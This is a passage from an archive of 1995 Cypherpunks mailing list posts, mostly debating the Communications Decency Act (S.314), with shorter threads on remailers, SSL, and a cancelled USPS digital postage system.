copped out and left it up to "Community Standards." This is partially why 
the AA bbs case was sucessfuly prosecuted in another state.

> Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
> already licking his lips over this one.

Under the new legislation, might this not be illegal? ;)

On another note, I mailed Stanton McClandish to find out what EFF's 
position is on this. I tried browsing their archives, but lots of stuff 
seems to have vanished from there.

Sam




Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:34:23 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.SV4.3.91.950208012852.25409C-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, L. McCarthy wrote:

> 
> BTW, what sort of "digital communication" is neither "wire communication" nor
> "electronic communication" ?

If I stick my middle finger up at you, isn't that non-electronic digital 
communication? (Injected for comic relief on a VERY serious topic. No 
flames please.)

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 7 Feb 95 22:47:49 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <v03001400ab5e06968201@[140.174.229.225]>
Message-ID: <199502080649.BAA02589@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[As always, IANAL. This citizen likes to think he has a reasonable capability
and obligation to assess the laws to which he may be subjected, though.]

After perusing it a couple of times, I'm still not sure I understand why the
specific provisions of the CDA would provoke the extreme monitoring measures
mentioned here. I agree with Sam that it's rather odd that EPIC hasn't put it
on their list of privacy-related bills in the 104th Congress. 

As a start, I'll try to speculate on sore points and their possible
immediate implications. 

+ "This Act may be cited as the `Communications Decency Act of 1995'."

Who elected Miss Manners to Congress ?  Any bill with `decency' in its title
deserves to die in committee, IMNSHO.

+ SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER THE 
+ COMMUNICATIONS ACT OF 1934.
[...]
+ (B) by striking out `makes any comment, request, suggestion, or
+         proposal' in subparagraph (A) and inserting `makes, transmits, or
+         otherwise makes available any comment, request, suggestion, proposal,
+         image, or other communication';

I take this section to be extending the ban on harassing phone calls and such
to cover all forms of electronic communication. I'm further assuming that the
subparagraph (A) mentioned above attempts to enumerate possible linguistic and
technical means of conveying the harassing content. What disturbs me is the
phrase "or otherwise makes available". I'm reminded of the arrest in Florida
a few years back of a couple whose lovemaking had been witnessed through their
bedroom window by a neighbor's curious child. My lay understanding of this
language is that passively presented information, such as the contents of a
WWW page or .plan file, could be construed as illegally obscene or harassing
under this act.

+ SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
+ Section 2511 of title 18, United States Code, is amended--
[...]
+ (A) by striking `wire, oral, or electronic communication' each place it
+         appears and inserting `wire, oral, electronic, or digital
+         communication', and

Is this the crucial threatening passage ?  Adding electronic communication to
a list presumably subject to "interception and disclosure" sounds ominous.
Without seeing the original legislation, though, I can't tell whether this
totally overturns the ECPA and similar statutes, or does something less 
drastic.

BTW, what sort of "digital communication" is neither "wire communication" nor
"electronic communication" ?

+ SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS.
[...]
+ `, except a cable operator may refuse to transmit
+   any public access program or portion of a public access program which
+   contains obscenity, indecency, or nudity'
[...]
+ `a cable operator may refuse to transmit any leased
+   access program or portion of a leased access program which contains
+   obscenity, indecency, or nudity.

The battle over "obscenity" has been fought long and hard.

"Indecency" seems a remarkably nebulous term (and, of course, ludicrously
Victorian). I'd be interested in seeing a legal definition, and alarmed if
there isn't one (yet).

Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
already licking his lips over this one.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 00:19:05 PST
To: cypherpunks@toad.com
Subject: Re: URGENT - What S.314 Would Do
In-Reply-To: <3h81qs$ee0@dockmaster.phantom.com>
Message-ID: <Pine.SV4.3.91.950208020311.25943A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On 7 Feb 1995, slowdog wrote:

>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
>    which is obscene, lewd, lascivious, filthy, or indecent;

Ding...Ding...Ding... We have a winner here. Goodbye binaries and sex groups.
Please note the "whoever" at the top of the paragraph. No "knowingly." 
The question is: "Is obsene speech, protected speech? Does this negate 
the first ammendment?

> 
>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;

Ding...Ding...Ding... We have another winner. Goodbye remailers. Probably 
90% of remailer traffic violates this one. Well boys and girls we'd 
better get lots more offshore...soon.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 00:26:37 PST
To: cypherpunks@toad.com
Subject: Re: Full text of S. 314
In-Reply-To: <Pine.SV4.3.91.950208010437.25409A-100000@mirage.skypoint.com>
Message-ID: <Pine.SV4.3.91.950208022428.26104C@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


I would suggest that everyone forward this to their ISP. It has a direct 
bearing on them and most won't be aware of it.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Wed, 8 Feb 95 00:14:53 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.BSI.3.91.950208031553.29206A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


> BTW, what sort of "digital communication" is neither "wire communication" nor
> "electronic communication" ?

Depending on how you take the word "digital", flipping someone off?  :)

/****************************************************************************
* Anthony Ortenzi * ortenzi@interactive.net * ortenzi@vivarin.pc.cc.cmu.edu *
*---------------------------------------------------------------------------*
*                 * http://www.interactive.net/~ortenzi/ *                  *
****************************************************************************/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 02:03:07 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080946.EAA01638@libws2.ic.sunysb.edu>
Message-ID: <Pine.SV4.3.91.950208035054.26559A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > Last I heard, the Supreme Court had never made a ruling on this. They 
> > copped out and left it up to "Community Standards." This is partially why 
> > the AA bbs case was sucessfuly prosecuted in another state.
> 
> I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
> v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
> say on television" skit and was taken to court. The court ruled that there
> were some obscene things which could be censored, but other things were
> indecent so could at most be relegated to late night hours (and they've
> struck down laws banning indecency 24 hours... I think some stations are
> suing with the claim that such relegation constitutes censorship).
> 
> Don't remember their exact formulation, which isn't very exact anyway.
> 

The question is: What is obsene? What the community in NYC considers 
obsene is sure a lot different than what the community in Elk River 
Minnesota considers obsene. (They've been trying to eject their one XXX 
bookstore for years now while NYC has the American Museum of Pornography 
at 42nd Street ;) ;) :) ) As you can see, obsenity depends where you are 
geographically located, at least according to our highest court. If 
community standards say it is obsene then it is. They never legally 
defined what constitutes something as being obsene or an obsenity.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 8 Feb 95 01:46:56 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950208011435.25409B-100000@mirage.skypoint.com>
Message-ID: <199502080946.EAA01638@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 8 Feb 1995, L. McCarthy wrote:
> 
> > The battle over "obscenity" has been fought long and hard.
> > 
> > "Indecency" seems a remarkably nebulous term (and, of course, ludicrously
> > Victorian). I'd be interested in seeing a legal definition, and alarmed if
> > there isn't one (yet).
> 
> Last I heard, the Supreme Court had never made a ruling on this. They 
> copped out and left it up to "Community Standards." This is partially why 
> the AA bbs case was sucessfuly prosecuted in another state.

I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
say on television" skit and was taken to court. The court ruled that there
were some obscene things which could be censored, but other things were
indecent so could at most be relegated to late night hours (and they've
struck down laws banning indecency 24 hours... I think some stations are
suing with the claim that such relegation constitutes censorship).

Don't remember their exact formulation, which isn't very exact anyway.

> > Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
> > already licking his lips over this one.
> 
> Under the new legislation, might this not be illegal? ;)
> 
> On another note, I mailed Stanton McClandish to find out what EFF's 
> position is on this. I tried browsing their archives, but lots of stuff 
> seems to have vanished from there.

Perhaps it was deemed too indecent to be on an archive site. Hell, they
cooperated plenty with the government on this.

It's a sad day when you might expect AT&T to stand up for your rights more
than the EFF...

> 
> Sam

Just my opinions,
  Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 06:20:39 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
In-Reply-To: <Chameleon.4.01.950207225342.jcorgan@comet.aeinet.com>
Message-ID: <199502081418.GAA23140@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@aeinet.com>

   One of the lessons learned in the years-long debate between the
   telco folks pushing synchronous time-division multiplexing point to
   point circuit switches and the data folks pushing variable length
   packet-switched broadcast medium networks is that fixed length
   packets can give you both TDM and statistical multiplexing.

There's an important difference here.  Namely, the telco/ATM folks
were building hardware from scratch and we're not.  We're layering on
top of an existing Internet routing environment.

This doesn't mean that your point is wrong, but that it may no longer
be true when the base layer is IP.  I'm not familiar enough with the
ATM arguments to know whether they're still valid in this other
domain.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 8 Feb 95 06:37:28 PST
To: cypherpunks@toad.com
Subject: WSJ Article on Sen. Exon's Legislation
Message-ID: <199502081435.GAA06488@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Government Tackles a Surge of Smut on the Internet"
Wall Street Journal
Wednesday, February 8, 1995 
page B1

----------Begin Quote----------

  Instead, the services would prefer to be treated like phone companies, 
which claim no responsibility for telephone conversations. With millions 
of messages passing through each day, the services say couldn't possibly 
monitor everything even if they tried.
  Sen. Exon is unconvinced. "If I were against this <the legislation>, 
if I didn't want to be bothered with it, if I felt it might complicate 
my ability to make money on the superhighway, that's the argument I 
would make," he says, adding that a failure by the government to act 
would be "an open invitation to some of the hardcore pornography getting 
into our homes."

-----------End Quote-----------


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 06:59:37 PST
To: cypherpunks@toad.com
Subject: Re: WSJ Article on Sen. Exon's Legislation
In-Reply-To: <199502081435.GAA06488@ix3.ix.netcom.com>
Message-ID: <199502081457.GAA23202@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   he says, adding that a failure by the government to act 
   would be "an open invitation to some of the hardcore pornography getting 
   into our homes."

I don't know about the rest of you, but I'd rather have that ol'
hardcore pornography in the privacy of our homes, where it belongs,
than in public, where innocent children might gain access to it.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haeberli@apple.com (Martin Haeberli)
Date: Wed, 8 Feb 95 08:06:08 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: Re: USPO & Digital Postage/E-Cash Project
Message-ID: <v02110101ab5e954ccb48@[198.68.90.31]>
MIME-Version: 1.0
Content-Type: text/plain


Dale,

I would appreciate any citations you can offer which:
-Describe the proposed system in some detail
-Describe the weaknesses identified by the CMU team.

Also, this group might want to know that CMU has (perhaps independently)
done work in this area over two years ago.  It may well be that the team at
CMU which did the USPO contract research is the same team that proposed
digital postage in a research paper in that time frame, and it may well be
that their system would withstand a much more rigorous attack.  I'm afraid
I've lost the precise citation, but I found the report browsing the CMU
tech reports server about 18 months ago.

Martin

At 10:25 PM 02/07/95, Dale Harrison (AEGIS wrote:
>The US Post Office just killed a project that would have created a
>digital postage/e-cash system.  This would have been a digital
>replacement for the Pitney-Bose style Postage Metering machines.  To use
>a PM machine one has to take the entire machine physically to a Postal
>Station and purchase some fixed dollar amount of postage.  The Postal
>clerk unseals and unlocks the machine, dials in the amount of postage
>purchased and then relocks and reseals the machine.
>
>This mechanical system would have been replaced by a serial-port dongle
>and a piece of software.  The dongle would contain an EEPROM in a
>replacable button (made by Dallas Semiconductor) into which would be
>loaded data indicating the amount of postage that had been purchased and
>not yet used.  The software package would be able to print the address,
>postage seal, routing codes, etc directly on the envelope via a laser
>printer and decrement the amount of available postage left in the
>dongle.  In the original test, customers would have to take the dongle
>to a Postal Station to purchase additional postage, but the ultimate
>goal was to have been to have a commerical dial-up service available
>that one could dial into and purchase additional postage directly.
>
>A proof-of-concept prototype was developed in VB and a production
>prototype was then developed in VC++.  Unfortunately the crypto wasn't
>very strong.  The USPO contracted with Carnege-Mellon to try and break
>the system and they were able to within a couple of weeks.  USPO then
>killed the project.
>
>
>Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 8 Feb 95 09:20:11 PST
To: Hal <perry@imsi.com
Subject: Re: MIME based remailing commands
In-Reply-To: <23676.792177411.1@nsb.fv.com>
Message-ID: <ojCAH3b0Eyt5QxSaNd@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
"Perry E. Metzger"@imsi. (2553)

> > > It is being remailed via a MIME-based structure where two new content types
> > > are defined: multipart/remail and application/remail-commands.  The
> > > multipart/remail type is supposed to be composed of two parts, the
> > > application/remail-commands part which has remailer commands, and the
> > > other part which is the "payload" to be remailed.

Perhaps you might consider writing up an informational RFC to define
these types?  I think that would be very useful. -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Wed, 8 Feb 95 06:42:12 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <199502081442.IAA29984@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb. 8, Samuel Kaplin wrote:
> The question is: What is obsene? What the community in NYC considers 
> obsene is sure a lot different than what the community in Elk River 
> Minnesota considers obsene. (They've been trying to eject their one XXX 
> bookstore for years now while NYC has the American Museum of Pornography 
> at 42nd Street ;) ;) :) ) As you can see, obsenity depends where you are 
> geographically located, at least according to our highest court. If 
> community standards say it is obsene then it is. They never legally 
> defined what constitutes something as being obsene or an obsenity.
> 
> Sam
> 

And don't forget the recent case where the operators of a California 
bulletin board were prosecuted and convicted in court in 
Memphis....whereas they never would have been convicted under the 
community standards in California.  You want to talk about 
scary....there is a section in Robert Heinlein's "Job: A Comedy of 
Justice" where the protagonist describes some "moral" codes that they 
got passed...one of them was having the community standards of the 
median size community of the state apply to all communities in the 
state.   What's the betting out there that this is what would 
ultimately happen under these kinds of bills?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 8 Feb 95 06:14:02 PST
To: cypherpunks@toad.com
Subject: Exon in WSJ
Message-ID: <199502081408.AA15271@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's WSJ - Page B1 - Above the fold

Government Tackles a Surge of Smut on the Internet

"On-line computer services are bracing for a government crackdown against
smut on the Internet -- even though nobody's sure if the Net *can* be
regulated."


Accompanying article on how demand for porno overwhelms sites that try to
supply it.

DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzjPtIVO4r4sgSPhAQF9IgP/Rv8haetVjaFqbd4j3QMSqAw7J219jej1
ZQTBujNlgFMb94TZSUy/X7oReAutJyaiWDvSyS7Nmnxx0xGAWMgR/8K9SlfJleia
Kja7H+cC7DODhGNMo3AUkn+shqKzz/idVZb3EiF1gtP3Xsm5DA5r9vqZyVZlFHxR
1IkGmN76Ax0=
=5UtC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 08:02:11 PST
To: cypherpunks@toad.com
Subject: Email Add's of Senators?
Message-ID: <v01510103ab5e8d499d2f@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Anyone have a list of these? Do they exist? It would be very helpful if they do and someone has a list or a pointer to a list, as my campus is gearing up a petition signing campaign against this S.314.
Thanks in advance,
- -Jaeson
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLzjdKObIUsJnAZfNAQEknwQA1malQkHdtMdX5okXYd2W/nY29gWr+ICM
cflNswC7ABV3wtmkMEACxP1geLXHI7zyqRWF3h6z23eqeOycYVZTfNKwDD8DykW0
fV+kru2dMuhhRihvTmH6ztdF9QCfB4LIAN38+GP0H0NFkRgZUs8dIXcHJh//pSec
F5bt7iDjwXw=
=vjyH
-----END PGP SIGNATURE-----

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 07:15:51 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: Re: USPO & Digital Postage/E-Cash Project
In-Reply-To: <199502080625.WAA20933@ix3.ix.netcom.com>
Message-ID: <9502081514.AA09856@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Dale Harrison (AEGIS) says:
> This would have been a digital replacement for the Pitney-Bose style
> Postage Metering machines.  To use a PM machine one has to take the
> entire machine physically to a Postal Station and purchase some
> fixed dollar amount of postage.  The Postal clerk unseals and
> unlocks the machine, dials in the amount of postage purchased and
> then relocks and reseals the machine.

This is not the only way to get postage in postage meters. Some P-B
machines also let you buy postage by phone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Wed, 8 Feb 95 07:20:36 PST
To: cypherpunks@toad.com
Subject: MBONE access needed
Message-ID: <9502081520.AA05523@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, guys!

I need to get MBONE access in New York City or nearby this weekend in
order to deliver a presentation for the Cypherpunks meeting this
Saturday on IPSP. If anyone in New York can provide such access,
please get in touch with me ASAP; the site that I thought I could use
has sadly become unavailable...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: System Operator <system@decode.com>
Date: Wed, 8 Feb 95 09:08:22 PST
To: cypherpunks@toad.com
Subject: Re: Seals and Sealing Waxes
Message-ID: <umN8Zc1w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


chen@intuit.com (Mark Chen) writes:

> with the requisite proclivities).  I only have a hardcopy, though if
> enough people are interested, I might be persuaded to scan some of it
> in.

This appears to be an appropriate point for me to extend an offer
to scan any cypherpunk material for this list and/or achives that may
be appropriate. I have a Hewlett-Packard ScanJet IIcx with the
Automatic Document Feeder attachment, and Caere's OmniPro OCR software,
as well as Microsoft Office and WordPerfect 6.0.


Dan
dan@decode.com

--
system@decode.com (System Operator)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NIEHS Autoresponder <usenet@jeeves.niehs.nih.gov>
Date: Wed, 8 Feb 95 07:38:43 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <9502081538.AA05136@jeeves.niehs.nih.gov>
MIME-Version: 1.0
Content-Type: text/plain


Your Usenet test article was received here at the news gateway machine for
the National Institute of Environmental Health Sciences, in Research Triangle
Park, North Carolina, USA 35 47 N by 78 38 W.  The NIEHS newsadmins can 
be reached via e-mail at usenet@news.niehs.nih.gov.
Please note that we do not offer news access to sites outside of our 
organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

Path: jeeves.niehs.nih.gov!darwin.sura.net!news.udel.edu!udel!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 10:52:26 PST
To: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Subject: Re: skronk
In-Reply-To: <9502080951.ZM27700@warp.mcom.com>
Message-ID: <199502081852.KAA01719@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
# FYI:
# 
# If you haven't already, I suggest you take a look at the SSL spec
# (http://home.mcom.com/info/SSL.html)

[ carbon to cypherpunks, whom i think would be interested]

i've been looking at that.  

It seems that a special port has to be allocated for each TCP service.
So it's not clear to me how to find out if others on the net offer SMTP
with SSL, or how I can put SSL into my X11 clients & server.  You see
what I'm getting at?

It also looks like some heavy equipment is necessary to manage these
RSA certficiates.  Is there anything like PGP's keyring management for
manipulating my web-of-trust?  Where do I find the docs?

# It does what you are trying to accomplish (I think), and it is already deployed
# in production code (the Netscape client and server products). In addition, we
# announced this week a free (for non-commerical use) reference implementation.
# The code will be out on the net as soon as the lawyers are happy :-)

aha ... that's the missing link.  I'd certainly like to add it to the
protocols that SKRONK advertizes and negotiates, but doing my own
implementation of these complex protocols, and building machinery for
using non-PGP certificates, was way more than I could handle.

Please beat your lawyers to a pulp, until they make it useful for us.
If I can't create generally useful things with it, and share it with
thousands of others on the net for free, it's not going to be used by
the cypherpunk community.

I recommend you put your reference implementation in the public domain
(except for the RSAREF component).  Or take Matt Blaze's crypto
offerings from AT&T as your model.  


		best regards, strick







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 11:02:25 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502081702.MAA06532@libws3.ic.sunysb.edu>
Message-ID: <199502081902.LAA01787@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


# > > I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
# > > v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't

individual words can be "indecent", but not obscene.

obscene refers to the content of the work as a whole, and would
be very difficult to attain with a few dirty words.

# > > say on television" skit and was taken to court. The court ruled that there
# > > were some obscene things which could be censored, but other things were

All obscene things are censored on broadcast radio & TV.  
Massive penalties for broadcasting obscene material.

# > > indecent so could at most be relegated to late night hours (and they've
# > > struck down laws banning indecency 24 hours... I think some stations are
# > > suing with the claim that such relegation constitutes censorship).

In the U. S., you have a first ammendment right to indencent speech.

The question of a late-night "safe harbor" for indecent speech on the
air is about when children are likely to be listening.  First
ammendment rights apparently don't apply to children who are listening
to the radio.  

Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
thru 6am, but this changes regularly, usually as a result of "case law"
(someone being prosecuted under next month's rules, not this month's)

				strick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 8 Feb 95 11:37:44 PST
To: strick@techwood.org
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <9502081137.ZM28317@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 8, 10:52am, strick@techwood.org wrote:
> Subject: Re: skronk
> THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
> # FYI:
> #
> # If you haven't already, I suggest you take a look at the SSL spec
> # (http://home.mcom.com/info/SSL.html)
>
> [ carbon to cypherpunks, whom i think would be interested]
>
> i've been looking at that.

good!

> It seems that a special port has to be allocated for each TCP service.
> So it's not clear to me how to find out if others on the net offer SMTP
> with SSL, or how I can put SSL into my X11 clients & server.  You see
> what I'm getting at?

It turns out you want seperate ports for each ssl-ized service because that way
the sysadmin types and the firewall guards are happy. They hate multiplexed
protocols because the standard off the shelf router equipment can't deal with
it.

> It also looks like some heavy equipment is necessary to manage these
> RSA certficiates.  Is there anything like PGP's keyring management for
> manipulating my web-of-trust?  Where do I find the docs?

You are right here. However, our observation is that an interesting chunk of
the world is moving towards using X.509 based certificate infrastructures for
many things. Everybody wants digital signatures and the related capabilities.
For more info, feel free to wade into the X.500 specs (not recommended for the
timid or weak of stomach :-), or go poke around on www.rsa.com and look into
their pkcs specs.

> # It does what you are trying to accomplish (I think), and it is already
deployed
> # in production code (the Netscape client and server products). In addition,
we
> # announced this week a free (for non-commerical use) reference
implementation.
> # The code will be out on the net as soon as the lawyers are happy :-)
>
> aha ... that's the missing link.  I'd certainly like to add it to the
> protocols that SKRONK advertizes and negotiates, but doing my own
> implementation of these complex protocols, and building machinery for
> using non-PGP certificates, was way more than I could handle.
>
> Please beat your lawyers to a pulp, until they make it useful for us.
> If I can't create generally useful things with it, and share it with
> thousands of others on the net for free, it's not going to be used by
> the cypherpunk community.
>
> I recommend you put your reference implementation in the public domain
> (except for the RSAREF component).  Or take Matt Blaze's crypto
> offerings from AT&T as your model.

The implementation will be out very shortly (it's already done and working). It
will be free for non-commerical usage, so hopefully most of the cypherpunks
will be happy (if there is such a state of affairs mind you :^)

We won't be having any of the copy-leftish stuff that is in the RSAREF license
- like not fiddling with the api, and having to give us back your hacks using
it...Of course we want to hear about what people are doing with it (thats
another purpose for the ssl-talk mailing list).


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 12:02:56 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <g53ElKjqRy8I078yn@mirage.skypoint.com>
Message-ID: <Pine.3.89.9502081135.A7848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> I find it amazing that CPR and EFF 
> haven't picked this up yet.

Really?
 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 8 Feb 95 09:03:00 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950208035054.26559A-100000@mirage.skypoint.com>
Message-ID: <199502081702.MAA06532@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
> > v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
> > say on television" skit and was taken to court. The court ruled that there
> > were some obscene things which could be censored, but other things were
